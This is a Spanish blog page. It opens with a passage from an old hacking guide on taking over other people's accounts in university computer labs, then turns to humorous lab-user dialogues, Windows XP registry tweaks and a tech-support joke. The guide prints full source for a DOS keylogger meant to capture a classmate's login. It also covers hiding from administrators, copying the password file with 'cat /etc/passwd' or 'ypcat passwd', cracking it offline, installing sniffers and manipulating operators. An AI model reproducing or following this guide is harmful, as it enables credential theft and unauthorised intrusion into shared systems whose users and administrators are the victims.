2- metodo (papelito revelador), pues eso, la gente es incapaz de recordar su password, y por eso lo apunta en algun papel, y suele ser que en un papel tengan los passwords de todas las maquinas a las que tienen acceso. Con lo que en el momento que lo sacan tienes unos instantes para memorizar el password. Luego es posible que tengan el mismo password en todas las maquinas a las qeu tienen acceso, ya no solo porque ellos se lo hayan puesto asi, sino porque el listo del administrador de turno asi lo ha dispuesto.

3- metodo (capturador de teclado), este es el que mas me gusta. Cojes y te vas a un ordenador (no vale terminal) y ejecutas la mierda de programa que te pongo a continuacion. Una vez ejecutado te pones a hacer el tonto hasta que viene el tipico julai que te dice “me dejas un momento entrar en mi cuenta para bajarme unos ficheros a disco”, vas tu y le dices “como no, para eso estamos los amigos, para ayudarnos entre nosotros” y pulsas F7, al hacer eso se vaciara el buffer y memorizara a partir de ese momento las primeras 512 pulsaciones. Cuando el julai en cuestion se va vas tu y pulsas F8, y en ese momento te apareceran las 512 teclas pulsadas y entre ellas el login y el password claro esta. Capturadores de teclado hay muchos, pero si quieres puedes usar el mio, que es facil, cortito y muy efectivo; aunque reconozco que los hay mas completos y mucho mejores que el mio.

————

uses dos;

{$M $800,0,0}

(* Grabador de teclado *) (* *) (* F7 -> Inicializa el buffer de teclado. *) (* F8 -> Muestra e incializa el buffer de teclado. *)

var KbdIntVec : Procedure; tab : array[1..512] of byte; n : integer;

procedure mostrar_autor; begin writeln; writeln(‘ Grabador de Teclado. ‘); writeln; writeln(‘ Autor: Lordman. 1 de Enero de 1996. ‘); writeln; end;

procedure inicializar; begin for n := 1 to 512 do tab[n] := 0; n := 0; end;

procedure mostrar; var car : char; tdec : string[53]; begin tdec := ‘ 1234567890 ! qwertyuiop + asdfghjkln – zxcvbnm,.- ‘; for n := 1 to 512 do begin if (tab[n] >= 1) and (tab[n] <= 57) then car := tdec[tab[n]] else car := ‘ ‘; write(car); end; inicializar; writeln; end;

{$F+} procedure Keyclick; interrupt; var aux : byte; begin aux := port[$60]; if aux < $80 then begin if n <= 512 then n := n + 1; tab[n] := aux; if aux = 66 then mostrar; if aux = 65 then inicializar; end; inline($9C); KbdIntVec; end; {$F-}

begin

mostrar_autor; inicializar; GetIntVec($9,@KbdIntVec); SetIntVec($9,Addr(Keyclick)); Keep(0);

end.

————

Cuando tengas ese password fijate a ver si son passwords de inicializacion. Me explico, ya he visto casos de cuentas que se creaban con passwords por defecto que seguian una tonica similar, por ejemplo, login: cuenta47, password: pass47, ?entendeis a lo que me refiero?.

Una vez que hayas conseguido la primera cuenta tienes que en distinto turno en el que el julai te haya pedido el favor. Es decir, por norma general la gente entras en sus cuentas en el turno de manana (de 9 a 2) o en el de tarde (de 3 a 8), con lo que tu tendras en cuenta ese detalle, date cuentas que si pillas con una maquina que no permita duplicidad de usuarios la puedes liar si el tio al entrar la maquina le dice que esta ya conectado.

Cuando entres la primera vez en la cuenta robada (y en cualquier otra que consigas) deberas utilizar el comando “last | grep <usuario>” cuyo comando te dara un listado de los ultimos accesos a esa cuenta, en cuyo listado podras ver a que horas se conecta el propietario de la cuenta y podras intentar evitar el coincidir con el.

Una vez entrado en la cuenta se recomienda hacer un doble login, es decir, 1 minuto despues de entrar ejecutas el comando “login” y vuelves a entrar para que al hacer un finger no aparezca puesto de acceso en donde estas. No es un sistema definitivo ya que te pueden cojer igualmente, pero por lo menos no lo pones tan facil. El esperar 1 minuto es para que en la lista de accesos no aparezcan los dos con una diferencia de pocos segundos y se deduzca que estas en el puesto de acceso desde donde se realizo la primera conexion. Insisto que no es un sistema definitivo, pero es algo, al menos si hacen un finger no aparecera el puesto de acceso desde donde os conectais. Aunque pueden usar las estadisticas de red y ahi sale todo, pero bueno, algo es algo.

Ten cuidado cuando uses la cuenta de trabajo para cosas provechosas. Disimula para que parezca que no estas haciendo nada malo, es decir, haz ftp’s a donde sea (maquinas locales si no hay acceso a internet), telnet’s, juega a algun juego que haya disponible, haz algun talk……. y en medio de todo eso pues ya sabes haz lo que de verdad te interese hacer. Mas que nada porque todas esas cosas que te he puesto anteriormente es lo que hace un usuario normal y claro, antetodo teneis que hacer ver que vosotros sois un usuario normal.

Otra cosa que esta bien hacer, es comprobar lo que hace la gente, para que si te estas rastreando tengas posibilidades de salirte a tiempo de la cuenta. Ejecutar el comando “w” y el “ps -u root” esta bien para ver lo que hace la gente y si ves que te referencian a ti, o a algun proceso que hayas estando haciendo, o a algun comando…. (todo ello anteponiendo, por parte del operador, el comando grep a veces) pues mal asunto, sal por patas que a lo mejor hay problemas. Una cosa tienes que recordar, no te preocupe no hackear el tiempo que a ti te hubiera gustado, piensa que manana habra mas tiempo, pero si te ligan a lo mejor manana no hay mas tiempo.

Llegado a este punto ya tienes una cuenta, lo primero que hay que hacer es intentar llevarte el fichero de passwords. Para esto hay fundamentalmente dos formas, la primera es un “cat /etc/passwd >passwd” aunque si la maquina tiene el fichero de passwords en shadow no te servira, en el caso de ficheros shadow y si la maquina es servidor de cuentas de otras maquinas (NIS) al ejecutar el comando “ypcat passwd

>passwd” recibiras una lista de todas las cuentas y sus passwords >sin

nada de shadow. Por ultimo estan algunas rutinas que sacan el fichero de passwords, yo personalmente nunca las he utilizado, aunque tambien es verdad que lo he intentado poco ya que o bien hackeaba contra sistemas UNIX sin shadow o bien con el truco de ypcat me bastaba. Si quereis buscar esas rutinas que os he comentado pues tirad de internet que hay mazo de ellas.

Una vez que has conseguido el fichero de passwords, te lo llevas a casa y alli utilizas los famosos crackeadores de cuentas UNIX como el John the Ripper, KillerCracker, Hades, BruteJack…. y intentas descubrir passwords desde tu casa y con la maxima discreccion que eso mismo conlleva. Con este sistema deberas conseguir bastantes cuentas para cubrirte las espaldas si pierdes alguna. Os puedo decir que en cierto servidor gratuito de email de mas de 13.500 cuentas logre petar casi 2.000, asi que os podeis hacer una idea de hasta donde se puede llegar. No os pongais a buscar servidores gratuitos de email porque le reporte al webmaster el error y ya esta solucionado. El error consistia en que podias hacer ftp con tu login y tu password para acceder al espacio dedicado a tu pagina web, una vez hecho eso te desviabas al subdirectorio donde estaba el fichero de password, lo cojias y como el sistema no tenia shadow pues asunto solucionado.

Luego deberas empezar a ejecutar maravillas como el Satan o el Cops y ver que pasa. No voy a explicar el funcionamiento de estos sistemas asi que a buscar el fichero y leeros el manual. En la misma maquina siempre podeis ejecutar el famoso “crack” el cual probara permutaciones de palabras y diccionarios hasta practicamente el infinito, este software nunca acaba, asi que no espereis a que acabe porque nunca lo hara. El problema es que si dejais un proceso de fondo estais sobrecargando demasiado la maquina y es posible que se den cuenta los administradores, aunque no necesariamente, un amigo mio ejecuto un proceso de esos sobre la cuenta root de una maquina de una facultad y tardaron 20 dias en descubrir el proceso. Naturalmente cuando lo descubrieron ni idea de quien fue y se limitaron a pararlo. Lo curioso es que la maquina mostraba un factor de carga altisimo y no se aparon del burro en 20 dias.

Llegado a este punto hay que empezar a buscar otras alternativas. De entrada y antes de seguir comentaros que os olvideis de bugs de sendmail, me puedo arriesgar a decir que no queda ninguna maquina que cuente con versiones del sendmail que casquen, bueno, si os encontrais con un bug descubierto este ano, pues vale, sirve, pero no intentes los infinitos bugs que aparecen porque lo llevais claro para que funcione uno. Alguna posibilidad teneis, pero se puede decir que si la version es una 8.x olvidaros de todo, si es una 7.x a lo mejor teneis algo por ahi y las unicas que petaban por todos los lados eran las 5.x. Daros cuenta que si hubiera una version petable del sendmail, fijo que ya la habrian petado antes que llegarais vosotros, con lo que si podeis mirar que version es por si tuvierais suerte pero no os obcequeis con probar bugs del senmail a ver si alguno funciona porque es dificil.

Si vais a hacer cosas peligrosas los mejores momentos son de 8 a 9 de la manana (los operadores estan llegando todavia o desayunando), de 2 a 4 de la tarde (estan comiendo como cerdos o cotilleando como marujas) y a partir de las 7 de la tarde (para esa hora se han ido a casa a decirles a sus mujeres lo buenos que han sido y lo bien que se han portado), aunque debereis verificar los horarios y ver cuales son los mas adecuados. Ni que decir que ni se os ocurra hacer nada por telefono, estais pillados y os pueden hacer un hijo de plastico.

Llegado este punto hay que plantearse la posibilidad de instalar un sniffer. Basicamente, hay tres posibles sniffers.

1- – Sniffer corriendo bajo MS-DOS. No es recomendable ya que la red novell lo detecta, no como sniffer, sino como que esta pasando algo raro en un puesto de acceso concreto.

2- – Sniffer desde cuenta UNIX, el mas usado, aunque no por ello el mas seguro. Hay utilidades UNIX que detectan si se esta ejecutando un sniffer en la maquina, aunque los operadores no suelen usar estas utilidades y en el peor caso te quedarias sin cuenta y procederias a usar otra, ya sabiendo que eso no lo puedes hacer. No obstante suelen detectar tambien estos procesos porque corren durante demasiado tiempo.

3- – Sniffer montado desde un Linux, el mas sofisticado y el que requiere algo de experiencia en Linux. La idea es muy sencilla, preparas un disco con una instalacion super-reducida del Linux, arrancas bajo MS-DOS y luego ejecutas el Linux. La instalacion del Linux debera ser en modo MS-DOS utilizando ficheros que se descomprimen en memoria gerando una unidad virtual. Esta sistema ademas te ofrecera la posibilidad de montar unidades de distintas maquinas, usando el famoso bug de la PC-NFS que consiste en que si quieres acceder a una cuenta que no sea la de root, no tienes mas que crear una cuenta con el mismo login (en tu maquina portable) y hacer un mount del subdirectorio. Ojo con dejar los demonios de entrada a la maquina, no vaya a ser que el operador haga un rastreo de ip’s y vuestra maquina responda. Me explico?, se instala in linux super-reducido en formato MS-DOS en un disquete, incluyendo una unidad RAM donde estan los pocos ejecutables que necesiteis.

Apartir de aqui, ya solo queda el sistema de empezar a probar bugs que hay en distintas direcciones de internet dedicadas a la materia. Para empezar estan bien las http://www.rootshell.com y http://www.hha.net; la de rootshell te permite hacer busquedas en base a palabras, lo cual te ofrece la posibilidad de introducirle el nombre del software UNIX que hay instalado y el buscador te mostrara lo que tiene. Creo que tambien, una de ellas, te permitia buscra por sistemas operativos, aunque eso ya no me acuerdo bien.

Un ultimo detalle que es obligado a la hora de dedicarse a esta tan noble arte es conocer al operador del sistema, si puedes hazte amigo de el, vete a tomar unas copas con el, incluso de vez en cuando que parezca que eres su amigo, es decir, utiliza la psicologica.

Hay varios tipos de operadores, tu futuro dependera del tipo con el que te tropiezes, mas o menos, se pueden resumir, segun mi experiencia, en cinco formatos de operador.

– El reprimido sexual, este es el peor, es como si su mujer le pegara y no hiciera el amor con el, lleva 7 anos sin follar y siente el orgasmo en base a buscar cabezas de turco, buscar culpables donde no los hay y demostrar su profesionalidad acusando a todo el que se le pone por delante para poder lavarse las manos y que antetodo siga intacta su imagen y prstigio internacional (por lo menos). Peligrosisimo y hay que tener mucho cuidado con el.

– El chuloputas, sin mas un chulo a nivel maximo. Continuamente esta demostrando su chuleria este donde este. Este es menos peligroso porque si te caza sin mas te humillara un poco y te dira que eres una mierda, pero al final posiblemente te dira que no lo vuelvas a hacer y es posible que lo olvide.

– El pasota. Sin mas el tipico que se limita a cobrar el sueldo a fin de mes y meterse en el minimo de lios posibles. Con este no tendras problemas ya que para que nadie dude de su profesionalidad si te caza lo arreglara contigo en privado, no te denunciara para no desvelar que le has hackeado el ordenador. Incluso es posible que a cuenta de eso se haga colega tuyo.

– El pelota. Pasa su vida haciendo la pelota a su superior mas proximo. Carece de personalidad alguna y es incapaz de pensar por si mismo. Si quieres saber con quien estas tratando deberas analizar a su superior y no a el.

– El subnormal. Pues eso, eimplemente, subnormal, no tiene ni idea de lo que hace, le han reciclado hace poco y no sabe ni por donde le da el aire, basicamente, sabe crear cuentas, cambias passwords y poco mas.

Puesta hasta aqui ha llegado mi primer articulo electronico. En el segundo voy a tratar el tema de que hacer si se tiene un password de root, aparentemente puede parecer absurdo lo que planteo pero vereis que no es tan absurdo y hay que tener en cuenta muchas cosas para poder usarlo, a no ser que el operador pase de todo o sea un inutil, claro esta.

Memorias de laboratorista de computo

mayo 17

Saludos!
cualquier parecido con la realidad  es…………….. LA NETA¡¡¡¡¡¡¡¡ Se que algunos de ustedes no son SemiDioses, es decir gente de sistemas,  pero por lo menos aprendanse de memoria la situacion, para no ser como el  alumno de estos dialogos…Estas son las escalofriantes declaraciones de un administrador que estaba a cargo del mantenimiento de las salas de computo en una Universidad Publica.

Son todas estrictamente veridicas, aunque pueda  parecer increible. Hay que tener en cuenta que la sala de la que se hacia cargo  estaba en la Facultad  de Empresariales, de modo que no se esperaba de los usuarios la posesion  de una vasta cultura informatica.

Pero tampoco se esperaban cosas como estas.   (Nota: Para salvaguardar la identidad de este “opereta”, usaremos el nombre generico de ROY para referirnos a el)

Alumno: “Hice este documento en casa, pero aqui no me carga”
Roy: “Bien. Que procesador de textos usaste?”
Alumno: “Windows, version 6”
Roy: “No, quiero decir que programa, no el sistema  operativo”
Alumno: “Windows”
Roy: “No. Windows es el sistema. Lo que quiero saber es el programa. Por ejemplo, puede haber sido WordPerfect, o Microsoft  Word…” [al alumno se le ilumina la cara]
Alumno: “Ah, claro! Fue con Microsoft Windows”  [aun no se como no lo mate]

Alumno: “No se si mi computadora pasara el 2000 y  estoy preocupado”
Roy: “Que modelo es?”
Alumno: “Es una Compaq”
Roy: “Buena marca, pero que modelo es?”
Alumno: “Ah!, es de las que les cabe el disquito de  3 no se que” [este sera uno de esos dias muuuuy largos]

Alumno: “Me puedes grabar Internet en este  disquete?”  [tentado estuve de grabarle el “acceso directo  a Internet  Explorer” y hacerle feliz…]

Alumno: “No jala mi password en mi cuenta, me salen  asteroides”  [me lleve un par de tensos segundos darme  cuenta de que  queria decir “asteriscos”]

Profesor: “En la casa quise instalar una impresora y no pude, ¿Me puedes ayudar?

Roy: ¿Que tipo de impresora es? Negro o a color  [uno preguntapara saber a que es lo que se va a enfrentar]

Profesor:  mmmh, es mas bien como color beige?? [completamente fuera de competencia :S]

Profesor: “Oye, en la sala de arriba queremos pasar  nuestros documentos a un nuevo sistema. Es muy complicado?”
Roy: “Depende. Que software estan usando?”  [expresion confusa en la cara  del profe]
Profesor: “Software? No usamos ningun software”  [genial; computadoras telepatas… y yo aqui con una Ultra  Sparc en la mesa]

Alumno: “Oye, valdria la pena instalar Windows 75?”  [esto es retro-computacion, y lo demas son  chingaderas]
Alumno: “Por que no aparece nada en internet?”
Roy: “Dejame ver… el servidor de red no esta  funcionando. Tendras que esperar un rato que lo levanten”
Alumno: “Bueno, mientras leere mis mails”  [que parte de “no esta funcionando” no explique bien? o  sera influyente?]

Alumno: “Necesito pasar esta imagen a mi cuenta para  un trabajo”
Roy: “Hecho!, te la paso por FTP en un momento”
Alumno: “No, no manches!, la imagen tiene que estar  en JPEG” [siempre he dicho que eso de los acronimos es un peligro  publico…]

Alumno: “Mi CPU no es lento, tiene un disco duro de 200 kegabytes”
[tres patadas en 12 palabras… deberia haber  mandado esto  al libro Guinness para que homologaran el  record]

Alumno: “Oye, Windows no me funciona, no se por que.
Habra sido por  cambiar el nombre del directorio WINDOWS a VENTANAS?” [nooo, sera la fase de la luna, pues se encuentra en laoctava casa de acuario….]

Alumno: “Se puede usar Word en las computadoras del Departamento?” [nota: eran estaciones Sun]
Roy: “No, esas maquinas usan UNIX”
Alumno: “Ah, claro, UNIX usa una version de DOS muy  antigua” [confieso que me costo recuperarme de esta]

Alumno: “Como puedo quitar mi PC del escritorio?”
Roy [confundido]: “Que pasa, esta atornillado a la  mesa o que?”
Alumno: “Me estas chamaqueando o que?”
Roy [mas confundido]: “No, no, como crees?… a ver,  donde quieres poner
tu PC? En el suelo?”
Alumno: “Te estas burlando de mi no?” eh? ?? ME ESTAS VACILANDO, NO??”
Roy [a la defensiva]: “Tranquilo, vamos por partes, eh? Me puedes explicar el problema con un poco mas de detalle?”
Alumno [mirandome como si yo fuera un idiota profundo]: “He quitado Internet, he quitado el Outlook y he quitado Mis  Documentos, pero no puedo quitar Mi PC. Ni la Papelera de Reciclaje tampoco”  [por que la gente no hablara con comillas?]

Alumno: “Oye, creo que hay archivos corrompidos en la computadora con la que trabajo”
Roy: “Por que crees eso?”
Alumno: “Lo abro y sale basura. Mira” [acto seguido  me lleva a una computadora, arranca MSDOS, lanza el EDIT y  abre… COMMAND.COM]
Roy [sonrisa sarcastica]: “Estoy de acuerdo en que es basura, pero…”  [me parece que no capto el chiste]

Alumno: “Me puedes ayudar? Se trabo la maquina y no  puedo escribir”
Roy: “Abriste algun archivo o paquete ademas del que  estas usando para escribir?” [hay que ponerse al nivel]
Alumno: “Abri Mis Documentos pero ya lo cerre y no me deja”
Roy: “Bien, selecciona la ventana con el programa en  que estabas escribiendo y podras continuar”
Alumno: “Es que no hay nada mas abierto, no hay mas cosas entre las cuales deba escoger” [me preocupare cuando el problema realmente sea  la maquina y  no el usuario]

Alumno: “Mi maquina se apago sin que la tocar”
Roy: “Como?”
Alumno: “Si, en lo que leia mis apuntes el monitor  se apago”  [muevo el mause y se enciende el monitor…  habia sido presa  del protector de pantalla maligno]

En cierta ocasion estaba enseñando los servidores  departamentales a un grupo de alumnos de primer curso… habia un DG 300 como servidor de terminales, donde se conectaban clientes bajo NT, X Window, y otros entornos]
Roy: “Y esto es un servidor DG 300 corriendo bajo DG/UX 5.4”
Alumno: “Que es eso?”
Roy: “El sistema operativo”
Alumno: “Corre bajo NT?”
Roy: “No, es DG/UX, un sistema operativo. Es una  variante de UNIX.Corre por si solo”
Alumno: “Ah, o sea, arrancas NT y…”  [este imbecil seguro que ha hecho carrera como empleado de  Microsoft]

Alumno: “Apague la computadora, la volvi a encender, y me sigue diciendo que ya puedo apagar la computadora”
Roy: “Eso es imposible”
Alumno: “Te lo juro, ven a verlo” [vamos hacia alla]
Alumno: “Mira. Apago . Enciendo …

Roy: “Ese es el monitor”. [imbecil…..]

Trucos para Windows XP

febrero 20

Acelerar la red con Windows XP profesional
 
INICIO-EJECUTAR y escribe gpedit.msc y pulsa enter. Aparecerá el editor de directivas de grupo en la izquierda. Configuración del equipo – plantillas administrativas – red; En la ventana de la derecha haz click sobre Programador de paquete QoS y luego en limitar ancho de banda reservado. En la pestaña de configuración selecciona Habilitada. En el menú desplegable “limite de ancho de banda” escribe 0. -ACEPTAR- 

 

Aumentar la velocidad del modem
 

Atención : La realización de este truco requiere la modificación de parámetros en el registro de Windows. Se aconseja no realizarlo a menos que se tenga conocimiento de lo que se está haciendo. Si lo desean, pueden pedir asesoramiento a la persona colaboradora.

1. Abrir el registro en la siguiente rama :

HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\VxD\MSTCP

2. Escribir seguidamente las claves y sus valores:
DefaultRcvWindow 23360 (valor de cadena)

DefaultTTL 128 (valor de cadena)

BSDUrgent 0 (valor de cadena)

DefaultMSS 1460 (valor de cadena)

DefaultMTU 1460 (valor de cadena)

SessionKeepAlive 1000 (valor de cadena)

SackOpts 1 (valor de cadena)

Tcp1323Opts 3 (valor Dword)

PMTUAutoDetection 1 (valor cadena)

PMTUBlackHoleDetect 0 (valor cadena)

PMTUBlackHoleEnabled 0 (valor cadena)

PMTUDiscovery 1 (valor cadena)
 

 

Windows XP en modo normal (no gráfico)

 
Para retirar la gráfica del XP y asi el sistema va más rápido:Acceder a propiedades de Mi Pc,ir a la pestaña Opciones avanzadas;rendimiento y configurar, en Efectos visuales seleccionar Ajustar para mejor rendimiento y opciones avanzadas seleccionar programas la dos veces.
Luego en Propiedades de Pantalla,elegir la pestaña Escritorio,Personalizar escritorio y elige los íconos que deseas ver en el escritorio. Sobre el botón inicio sacar propiedades y elegir Menú inicio clásico y listo.

 

 

Saber si nuestro Windows XP está activado
 
Si queremos saber si nuestra copia de Windows XP está activada solo tendremos que seguir estos sencillos pasos:

Iremos a Inicio-Ejecutar y tecleraremos: C:\WINDOWS\SYSTEM32\OOBE\msoobe.exe /A
 

 
Como hacer que Windows Media Player 9 Series funcione a full

 
Lo primero que debes hacer es ir al boton ejecutar y escribir “regedit.exe”, claro que sin las comillas. Una vez alli dirigete hacia HKEY_LOCAL_MACHINE. Te va a aparecer un menú desplegable. Ve hacia software, luego hacia Microsoft, elije la carpeta Media Player y encontrarás varios registros.

Los que debemos eliminar son aquellos que dicen 7.0 Y 8.0. Lo que vamos a hacer es borrarlos haciendoles un clic derecho sobre el mismo y eligiendo eliminar.

Si tu Pc ya vino con Windows XP Pre-Instalado el registro 7.0 debería no estar, así que no va a hacer falta eliminarlo.

Reinicia tu PC,y notarás una perfecta grabación de CDs, una mejor compresión de imágenes etc.

PD: Te conviene crear un punto de restauración por si fallas en algo.

 

 

Cambiar el nombre del dueño y compañia de Windows XP
 
 
Para realizar este truco debes hacer lo siguiente abre el libro de registro de windows (regedit.exe desde ejecutar), luego dentro de la rama HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, encontrarás dos valores de cadena llamados; RegisteredOrganization y RegisteredOwner a los que podrás modificar su valor colocándoles el nombre que tu quieras (no es necesario cerrar el libro de registro para comprobarlo) y truco realizado.

Llamada a soporte tecnico

febrero 20

Riiinggg !!! Riiinggg !!!
Soporte: Soporte Técnico, Buenos Días.
Cliente: Si, bueno, tengo un problema con mi Word.
Soporte: ¿Qué tipo de problema?
Cliente: Bueno solamente estaba escribiendo y de pronto todas las palabras se fueron.
Soporte: ¿Se fueron?
Cliente: Desaparecieron.
Soporte: Hmm Entonces, ¿Qué hay en la pantalla ahora?
Cliente: Nada. Está en blanco. No acepta nada cuando escribo.
Soporte: ¿Esta usted todavía en Word, o lo cerró?
Cliente: ¿Cómo lo puedo saber?
Soporte: Puede ver el C prompt en la pantalla.
Cliente: ¿Qué es un prompt ?
Soporte: Olvídelo. ¿Puede mover el cursor a través de la pantalla?
Cliente: No hay ningún cursor. Ya le dije no acepta nada cuando escribo.
Soporte: ¿Tiene su monitor un indicador de poder?
Cliente: ¿Dónde esta el monitor?
Soporte: Es la cosa con la pantalla que se parece a un televisor. Tiene una pequeña lucecita que le indica cuando esta encendido.
Cliente: No sé.
Soporte: Bueno entonces mire atrás del monitor y encuentre el cable de poder que sale de éste. ¿Lo puede ver?
Cliente: Si creo que sí.
Soporte: Cuando se asoma detrás del monitor nota que hay dos cables conectados a él y no solo uno.
Cliente: No.
Soporte: Bueno hay dos. Necesito que vuelva a mirar atrás y encuentre el otro cable.
Cliente: OK aquí esta. Soporte: Por favor sígalo y dígame si está bien conectado atrás de su computadora.
Cliente: No alcanzo.
Soporte: Bueno, puede ver si lo está?
Cliente: No.
Soporte: Tal vez si pone su rodilla en algo y se inclina.
Cliente: No es porque no tenga el ángulo correcto es porque está oscuro.
Soporte: ¿Oscuro?
Cliente: Si la luz de la oficina esta apagada y la única luz que me llega viene de la ventana.
Soporte: Bueno entonces encienda la luz de la oficina.
Cliente: No puedo.
Soporte: ¿No? ¿Por qué no?
Cliente: Porque hace un rato se fue la electricidad.
Soporte: Ah, la electricidad.. Se fue la electricidad. Aja. Bueno ya lo tenemos. ¿Todavía tiene las cajas y manuales y los demás empaques en que venía su computadora?
Cliente: Bueno, sí los mantengo en el armario.
Soporte: Excelente. Sáquelos desconecte su sistema y empáquelo tal como estaba cuando lo compró. Luego llévelo de vuelta al departamento que se le dio.
Cliente: ¿De verdad? ¿Tan malo es?
Soporte: Sí, me temo que sí.
Cliente: Bueno, está bien supongo. ¿Qué les digo?
Soporte: Dígales que usted es demasiado &#%#@$/?%$!! para tener una computadora.